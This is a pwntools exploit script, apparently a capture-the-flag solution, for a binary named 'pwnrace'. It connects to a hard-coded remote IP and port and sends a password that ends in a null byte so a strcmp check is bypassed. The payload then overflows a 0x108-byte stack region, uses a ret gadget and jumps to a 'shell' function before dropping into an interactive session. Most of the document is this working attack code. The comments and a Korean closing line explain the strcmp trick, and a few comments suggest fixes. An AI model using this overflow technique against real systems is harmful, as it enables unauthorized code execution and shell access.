from pwn import *
# Global pwntools settings: verbose I/O logging, a 64-bit x86 target, and the
# terminal command pwntools uses when it needs a new window (e.g. a debugger).
context.update(
    log_level='debug',
    terminal=['urxvtc', '-e', 'sh', '-c'],
    arch='amd64',
)
#context.arch = 'i386'

# Remote challenge service; the connection is opened as soon as this line runs.
ip = "159.223.101.241"
port = 31337
p = remote(ip, port)

# Local copy of the challenge binary, loaded so symbols can be resolved by name.
file_name = "./pwnrace"
# NOTE(review): libc_name repeats the binary's name and is only referenced by
# the commented-out ELF(libc_name) line -- presumably a leftover from a template.
libc_name = "pwnrace"
#p = process(file_name)
e = ELF(file_name)
#libc = ELF(libc_name)
def slog(name, addr):
    """Log a labelled address as ``name: 0x...`` via pwntools' ``success``.

    ``name`` must be a string (it is joined, not formatted) and ``addr`` an
    integer accepted by ``hex()``. Returns whatever ``success`` returns.
    """
    message = ": ".join((name, hex(addr)))
    return success(message)
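# Input sent to the password prompt. The challenge source is not shown on this
# page, so the sizes and addresses below are the author's values and are not
# re-derived here.
#
# The password is followed by a NUL byte: strcmp() stops comparing at the first
# NUL, so the bytes after it are not seen by a strcmp-based check.
payload = b"hAcK_Th3_Pl@n3t" + b'\x00'
# Pad to 0x100 + 0x8 bytes in total -- presumably the buffer size plus the saved
# frame pointer; TODO confirm against the binary.
payload = payload.ljust(0x100 + 0x8, b"A")
# NOTE(review): 0x40101a is hard-coded; presumably a bare `ret` kept for stack
# alignment -- confirm. A fixed code address is only valid while the binary is
# loaded at a fixed base.
payload += p64(0x000000000040101a)
payload += p64(e.sym['shell'])
# Defensive reading (inferred from this script only): the input is longer than
# the buffer it is read into and is validated with a NUL-terminated compare.
# A length-bounded read fixes the root cause; stack protector and PIE builds
# would invalidate the fixed offsets and addresses used above.

# Block until a key is pressed, leaving time to attach a debugger locally.
pause()
# The delimiter is a bytes literal: pwntools tubes work on bytes, and a str
# delimiter makes it guess the encoding and emit a BytesWarning on Python 3.
p.sendlineafter(b"\x1B[0;32mEnter Password:\n\x1B[0m", payload)
p.interactive()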
strcmp는 첫 번째 널 바이트(\x00)에서 비교를 멈추므로, 비밀번호 뒤에 널 바이트를 넣으면 그 뒤에 이어지는 바이트는 비교 결과에 영향을 주지 않는다. 이 strcmp의 특성을 이용해 풀이하면 된다.